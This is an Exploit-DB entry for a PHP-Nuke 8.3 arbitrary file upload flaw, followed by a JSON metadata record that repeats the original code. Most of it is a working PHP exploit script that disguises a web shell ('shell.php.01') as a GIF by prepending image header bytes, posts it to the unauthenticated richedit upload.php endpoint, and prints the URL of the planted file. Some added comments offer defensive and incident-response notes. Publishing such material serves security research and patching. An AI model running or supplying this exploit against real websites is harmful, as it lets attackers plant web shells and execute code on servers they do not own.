ID EDB-ID:35853
Type exploitdb
Reporter pentesters.ir
Modified 2011-06-13T00:00:00
Description
Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1). Webapps exploit for php platform
source: http://www.securityfocus.com/bid/48257/info
Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
Phpnuke 8.3 is vulnerable; other versions may also be affected.
<?php
///////////////////////////////////////////////////
#Iranian Pentesters Home
#PHP Nuke 8.3 MT AFU Vulnerability
#Coded by:4n0nym0us & b3hz4d
#http://www.pentesters.ir
///////////////////////////////////////////////////
//Settings:
// Base URL of the PHP-Nuke installation (placeholder value); the upload script path is appended further down.
$address = 'http://your-target.com';
// Local file whose contents are sent. The name carries a trailing ".01" after ".php".
// NOTE(review): presumably this is meant to pass a filter that inspects only the final
// extension; the server-side check is not shown on this page - confirm against upload.php.
$file = 'shell.php.01';
// Prefix for the modified copy written next to the original file.
$prefix='pentesters_';
//Exploit:
// The ten bytes are the ASCII signature "GIF89a" followed by 05 00 05 00 (a 5x5 logical
// screen size in the GIF header layout), so the payload starts like a GIF image.
// A check that looks only at the leading bytes or the declared MIME type would see an image.
// The leading @ silences PHP diagnostics on these two statements.
@$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
// Append the local file after the GIF header. If the file cannot be read,
// file_get_contents() returns false and only the header is kept.
@$file_data .= file_get_contents($file);
// Write header + contents to "<prefix><file>" and use that copy from here on.
file_put_contents($prefix . $file, $file_data);
$file = $prefix . $file;
// Banner output only (the label printed here reads "RFU" while the file header says "AFU").
echo "\n" . "///////////////////////////////////" ."\n";
echo " Iranian Pentesters Home" . "\n";
echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
echo "///////////////////////////////////" ."\n";
// Endpoint the request is sent to: the upload script under includes/richedit.
$address_c = $address . '/includes/richedit/upload.php';
// Form fields. "userfile" uses the legacy "@path;type=..." string form of CURLOPT_POSTFIELDS;
// the image/gif content type is declared by the client, not derived from the file.
// post_data() sets no cookie or session header; whether "pwd" acts as a credential and what
// "upload" and "path" mean on the server side is not shown on this page.
// Defensive takeaway: an upload handler reachable this way should authenticate the caller,
// allow-list extensions against the whole filename, and store uploads where scripts cannot execute.
$postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1");
$data = post_data($address_c, $postdata);
// Look for the <img src="upload... tag in the response body.
$start = strpos($data, "<img src=\"upload");
// Loose comparison: strpos() yields false when the marker is absent, and both false and 0
// compare equal to null, so a match at offset 0 would also take the failure branch.
if ($start != null)
{
// Skip the 10 characters of the <img src=" prefix, then keep everything up to the closing
// quote: the relative path reported by the server, which begins with "upload".
$data = substr($data,$start + 10);
$end = strpos($data, "\"");
$data = substr($data,0,$end);
// The printed URL places the stored file under /includes/richedit/. For incident response,
// that is the location to inspect for unexpected files, going by what this script prints.
echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
}
else
echo "\n" . "Upload Failed!!!";
/**
 * Send a form POST with cURL and hand back the response body.
 *
 * The request carries a fixed User-Agent string, follows redirects, and sets
 * no cookie, timeout or authentication option.
 *
 * @param string $address URL the request is sent to.
 * @param mixed  $data    Form fields; passed unchanged to CURLOPT_POSTFIELDS.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
function post_data($address, $data)
{
    // Options are applied one at a time, in declaration order.
    $options = array(
        CURLOPT_USERAGENT => "Opera/9.0 (Windows NT 5.0; U; en)",
        CURLOPT_POST => 1,
        CURLOPT_POSTFIELDS => $data,
        // Return the body from curl_exec() instead of printing it.
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
    );

    $handle = curl_init($address);
    foreach ($options as $option => $value) {
        curl_setopt($handle, $option, $value);
    }

    $response = curl_exec($handle);
    curl_close($handle);

    return $response;
}
?>
{"id": "EDB-ID:35853", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability 1", "description": "Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1). Webapps exploit for php platform", "published": "2011-06-13T00:00:00", "modified": "2011-06-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/35853/", "reporter": "pentesters.ir", "references": [], "cvelist": [], "lastseen": "2016-02-04T02:09:01", "viewCount": 3, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-02-04T02:09:01", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-04T02:09:01", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://www.exploit-db.com/download/35853/", "sourceData": "source: http://www.securityfocus.com/bid/48257/info\r\n\r\nPhpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.\r\n\r\nAn attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.\r\n\r\nPhpnuke 8.3 is vulnerable; other versions may also be affected. \r\n\r\n<?php\r\n///////////////////////////////////////////////////\r\n#Iranian Pentesters Home\r\n#PHP Nuke 8.3 MT AFU Vulnerability\r\n#Coded by:4n0nym0us & b3hz4d\r\n#http://www.pentesters.ir\r\n///////////////////////////////////////////////////\r\n//Settings:\r\n$address = 'http://your-target.com';\r\n$file = 'shell.php.01';\r\n$prefix='pentesters_';\r\n\r\n\r\n//Exploit:\r\n@$file_data = \"\\x47\\x49\\x46\\x38\\x39\\x61\\x05\\x00\\x05\\x00\";\r\n@$file_data .= file_get_contents($file);\r\nfile_put_contents($prefix . $file, $file_data);\r\n$file = $prefix . $file;\r\necho \"\\n\" . \"///////////////////////////////////\" .\"\\n\";\r\necho \" Iranian Pentesters Home\" . \"\\n\";\r\necho \" PHP Nuke 8.3 MT RFU Vulnerability\" . 
\"\\n\";\r\necho \"///////////////////////////////////\" .\"\\n\";\r\n$address_c = $address . '/includes/richedit/upload.php';\r\n$postdata = array(\"userfile\" => \"@$file;type=image/gif\",\"upload\" => \"1\",\"path\" => \"images\",\"pwd\" => \"1\");\r\n$data = post_data($address_c, $postdata);\r\n$start = strpos($data, \"<img src=\\\"upload\");\r\nif ($start != null)\r\n{\r\n$data = substr($data,$start + 10);\r\n$end = strpos($data, \"\\\"\");\r\n$data = substr($data,0,$end);\r\necho \"\\n\" . \"Uploaded File: \" . $address . \"/includes/richedit/\" . $data . \"\\n\";\r\n}\r\nelse\r\necho \"\\n\" . \"Upload Failed!!!\";\r\nfunction post_data($address, $data)\r\n{\r\n $curl = curl_init($address);\r\n curl_setopt($curl, CURLOPT_USERAGENT, \"Opera/9.0 (Windows NT 5.0; U; en)\");\r\n curl_setopt($curl, CURLOPT_POST, 1);\r\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);\r\n $content = curl_exec($curl);\r\n curl_close($curl);\r\n return $content;\r\n}\r\n?>\r\n\r\n", "osvdbidlist": []}
{}